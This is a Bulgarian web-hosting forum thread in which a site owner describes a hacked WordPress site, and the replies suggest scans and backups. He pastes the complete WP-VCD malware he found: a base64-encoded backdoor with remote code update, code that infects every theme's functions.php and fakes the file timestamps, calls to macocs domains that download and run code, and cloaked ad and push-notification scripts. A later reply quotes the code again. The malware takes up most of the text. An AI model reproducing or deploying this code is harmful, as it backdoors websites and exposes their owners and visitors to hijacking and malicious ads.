Налазил ме е някой, малко проверка?

E

EASYSURVIVOR

Well-Known Member
Налазил ме е някой , не съм погледнал сайта от няколко месеца, и днес като проверявах някой ме е налазил, като кликна на някой бутон и се отваряха други сайтове.. Използвах WordeFence проверих изтрих малко неща, изтрих и качих на ново Wordpress темата, но не знам дали успешно съм премахнал всичко, та каква проверка да направя? Или ако може да погледнете дали още се отварят други сайтове..

Speedstart.org
 
Пиши на хостинг провайдъра да ти пуснат сканиране, ако нямаш достъп до тази функция.
Не се отварят други сайтове, но това не гарантира че все още няма злонамерен код някъде по сайта.
Успех
 
CryptoInvest каза:
Пиши на хостинг провайдъра да ти пуснат сканиране, ако нямаш достъп до тази функция.
Не се отварят други сайтове, но това не гарантира че все още няма злонамерен код някъде по сайта.
Успех
Увеличете...


Код: 
Filename: wp-includes/wp-vcd.php
File Size:    13,328 bytes
File last modified:    Thursday 8th of March 2018 09:26:48 PM
<?php
error_reporting(0);
ini_set('display_errors', 0);

    $install_code = 'PD9waHANCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpDQoJew0KJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7DQoJCXN3aXRjaCAoJF9SRVFVRVNUWydhY3Rpb24nXSkNCgkJCXsNCg0KCQkJCQ0KDQoNCg0KDQoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7DQoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ25ld2RvbWFpbiddKSkNCgkJCQkJCXsNCgkJCQkJCQkNCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c1woImh0dHA6XC9cLyguKilcL2NvZGVcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkJCQkJY2FzZSAnY2hhbmdlX2NvZGUnOw0KCQkJCQlpZiAoaXNzZXQoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KDQoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoJCQkJDQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiBXUF9WX0NEIFdQX0NEIjsNCgkJCX0NCgkJCQ0KCQlkaWUoIiIpOw0KCX0NCg0KDQoNCg0KDQoNCg0KDQokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOw0KJGZ1bmNmaWxlICAgICAgPSBfX0ZJTEVfXzsNCmlmKCFmdW5jdGlvbl9leGlzdHMoJ3RoZW1lX3RlbXBfc2V0dXAnKSkgew0KICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOw0KICAgIGlmIChzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtY3Jvbi5waHAnKSA9PSBmYWxzZSAmJiBzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAneG1scnBjLnBocCcpID09IGZhbHNlKSB7DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQ0KICAgICAgICB7DQogICAgICAgICAgICAkY2ggPSBjdXJsX2luaXQoKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgVFJVRSk7DQogICAgICAgICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOw0KICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KICAgICAgICAgICAgcmV0dXJuICRkYXRhOw0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiB0aGVtZV90ZW1wX3NldHVwKCRwaHBDb2RlKQ0KICAgICAgICB7DQogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQogICAgICAgICAgIGlmKCBmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpKQ0KCQkgICB7DQoJCSAgIH0NCgkJCWVsc2UNCgkJCXsNCgkJCSR0bXBmbmFtZSA9IHRlbXBuYW0oJy4vJywgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOw0KCQkJfQ0KCQkJZmNsb3NlKCRoYW5kbGUpOw0KICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7DQogICAgICAgICAgICB1bmxpbmsoJHRtcGZuYW1lKTsNCiAgICAgICAgICAgIHJldHVybiBnZXRfZGVmaW5lZF92YXJzKCk7DQogICAgICAgIH0NCiAgICAgICAgDQoNCiR3cF9hdXRoX2tleT0nYmI5YWVkNjk2YjA4MGQ2ZDMyN2Q5MjdmYzBiNzMzZDgnOw0KICAgICAgICBpZiAoKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3Lm1hY29jcy5jb20vY29kZS5waHAiKSBPUiAkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c190Y3VybCgiaHR0cDovL3d3dy5tYWNvY3MuY29tL2NvZGUucGhwIikpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KDQogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICANCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy5tYWNvY3MucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgew0KDQppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICB9IA0KCQkNCgkJICAgICAgICBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3Lm1hY29jcy50b3AvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgew0KDQppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQoJCWVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgDQogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOyANCg0KICAgICAgICB9IGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoJ3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOyANCg0KICAgICAgICB9IA0KICAgICAgICANCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICANCiAgICAgICAgDQogICAgfQ0KfQ0KDQovLyRzdGFydF93cF90aGVtZV90bXANCg0KDQoNCi8vd3BfdG1wDQoNCg0KLy8kZW5kX3dwX3RoZW1lX3RtcA0KPz4=';
  
    $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
    $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  

            $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
              
            $ping = true;
                $ping2 = false;
            if ($list = scandir( $themes ))
                {
                    foreach ($list as $_)
                        {
                      
                            if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
                                {
                                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
                                      
                                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
                                        {
                                            if (strpos($content, 'WP_V_CD') === false)
                                                {
                                                    $content = $install_code . $content ;
                                                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                                                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                                                }
                                            else
                                                {
                                                    $ping = false;
                                                }
                                        }
                                      
                                }
                              
                              
                                                              else
                                                            {
                                                            $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
                                                     foreach ($list2 as $_2)
                                                              {
                                                          

                                                                                    if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                                                      {
                                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
                                      
                                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                                        {
                                            if (strpos($content, 'WP_V_CD') === false)
                                                {
                                                    $content = $install_code . $content ;
                                                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                                                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                                                    $ping2 = true;
                                                }

                                            else
                                                {
                                                    //$ping = false;
                                                }
                                        }
                                      
                                }



                                                                                  }

                                                            }
                              
                              
                              
                              
                              
                              
                        }
                      
                    if ($ping) {
                        $content = @file_get_contents('http://www.macocs.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
                        //@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.macocs.com/admin.txt'));
                    }
                  
                                                            if ($ping2) {
                        $content = @file_get_contents('http://www.macocs.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
                        //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.macocs.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
                    }
                  
                  
                  
                }
      




?><?php error_reporting(0);?>

Код: 
/wp-includes/wp-tmp.php
File Size:    2,884 bytes
File last modified:    Sunday 29th of April 2018 05:57:19 PM
ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='bb9aed696b080d6d327d927fc0b733d8';





$file=file_get_contents(get_template_directory().'/functions.php');
$filec=file_get_contents(get_stylesheet_directory().'/functions.php');
$rep="macocs.top";
$repw="macocs.xyz";
if (stripos($file,$rep) !== false)
{
$new_file=str_replace($rep,$repw,$file);
@file_put_contents(get_template_directory().'/functions.php',$new_file);
}

if (stripos($filec,$rep) !== false)
{
$new_filec=str_replace($rep,$repw,$filec);
@file_put_contents(get_stylesheet_directory().'/functions.php',$new_filec);
}


if ( ! function_exists( 'slider_option' ) ) { 

function slider_option($content){
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1594340"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1594343&interactive=1&pushup=1"></script>
<script src="//pushnest.com/ntfc.php?p=1594344" data-cfasync="false" async></script>
<script src="//go.mobtrks.com/notice.php?p=1594346&interstitial=1"></script>
';

$content=$content.$con2;
}
return $content;
}

function slider_option_footer(){
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1594340"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1594343&interactive=1&pushup=1"></script>
<script src="//pushnest.com/ntfc.php?p=1594344" data-cfasync="false" async></script>
<script src="//go.mobtrks.com/notice.php?p=1594346&interstitial=1"></script>

';

echo $con2;
}
}








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
    $sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

}





}

Ето май какво се вмъкват
 
devilx каза:
Налазил ме е някой , не съм погледнал сайта от няколко месеца, и днес като проверявах някой ме е налазил, като кликна на някой бутон и се отваряха други сайтове.. Използвах WordeFence проверих изтрих малко неща, изтрих и качих на ново Wordpress темата, но не знам дали успешно съм премахнал всичко, та каква проверка да направя? Или ако може да погледнете дали още се отварят други сайтове..

Speedstart.org
Увеличете...
Кто че ли всичко се отваря, както би трябвало да е. Сочи си към вътрешни страници, или към указани външни (https://www.watchsportstv.live)
 
Pavlin_Kralev каза:
Кто че ли всичко се отваря, както би трябвало да е. Сочи си към вътрешни страници, или към указани външни (https://www.watchsportstv.live)
Увеличете...
Ами този код който постнах? Интересното е че когато кликвах се отваряше друг сайт. Когато махнах сайта си от Cloudflare се махна и този проблем..
 
devilx каза:
Ами този код който постнах? Интересното е че когато кликвах се отваряше друг сайт. Когато махнах сайта си от Cloudflare се махна и този проблем..
Увеличете...
От кода, като че ли се натрисаш на някакви порнотии. Някакви скорошни архиви пазиш ли?
 
devilx каза:
Казах на съопорта да провери, евентуално те сигурно имат автоматичен бекъп и трябва да си ги пазят..
Увеличете...
Прави си и ти по нататък. Всичко ще бъде наред. Ако нямат ще има работа, но това лайно (кода ти по горе) май не трябва да е в продукта ти.
 
Последно редактирано:
devilx каза:
Код: 
Filename: wp-includes/wp-vcd.php
File Size:    13,328 bytes
File last modified:    Thursday 8th of March 2018 09:26:48 PM
<?php
error_reporting(0);
ini_set('display_errors', 0);

    $install_code = 'PD9waHANCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpDQoJew0KJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7DQoJCXN3aXRjaCAoJF9SRVFVRVNUWydhY3Rpb24nXSkNCgkJCXsNCg0KCQkJCQ0KDQoNCg0KDQoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7DQoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ25ld2RvbWFpbiddKSkNCgkJCQkJCXsNCgkJCQkJCQkNCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c1woImh0dHA6XC9cLyguKilcL2NvZGVcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkJCQkJY2FzZSAnY2hhbmdlX2NvZGUnOw0KCQkJCQlpZiAoaXNzZXQoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXH